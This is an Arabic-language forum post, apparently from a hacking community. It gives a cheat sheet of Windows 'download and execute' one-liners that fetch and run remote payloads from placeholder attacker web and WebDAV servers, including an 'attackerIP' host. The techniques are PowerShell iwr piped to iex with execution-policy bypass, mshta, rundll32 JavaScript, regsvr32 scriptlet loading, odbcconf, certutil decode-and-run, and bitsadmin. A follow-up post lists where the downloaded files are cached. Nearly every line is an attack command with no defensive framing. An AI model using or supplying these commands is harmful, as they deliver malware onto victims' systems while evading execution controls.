Windows - Download and execute methods

تم تحميل الصفحة في 1,7711585 ثانية
Windows - Download and execute methods
إنضم
11 أغسطس 2016
المشاركات
687
الإعجابات
598
النقاط
133
بسم الله الرحمن الرحيم
اسلام عليكم ورحة الله وبركاتة



Windows - Download and execute methods

Powershell
From an HTTP server
كود:
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
From a Webdav server
كود:
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
Cmd
كود:
cmd.exe /k < \\webdavserver\folder\batchfile.txt
Cscript / Wscript
كود:
cscript //E:jscript \\webdavserver\folder\payload.txt
Mshta
كود:
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
كود:
mshta http://webserver/payload.hta
كود:
mshta \\webdavserver\folder\payload.hta
Rundll32

كود:
rundll32 \\webdavserver\folder\payload.dll,entrypoint
كود:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
Regasm / Regsvc @subTee

كود:
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Odbcconf

كود:
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Certutil

كود:
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Bitsadmin

كود:
bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
وسلام عليكم
ملاحضه (ملها علاقه في اختراق المواقع )
 
إنضم
11 أغسطس 2016
المشاركات
687
الإعجابات
598
النقاط
133
###
Downloaded files location
  • كود:
    C:\Users<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
    C:\Users<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>
    C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
 
إنضم
11 أغسطس 2016
المشاركات
687
الإعجابات
598
النقاط
133

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 1 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل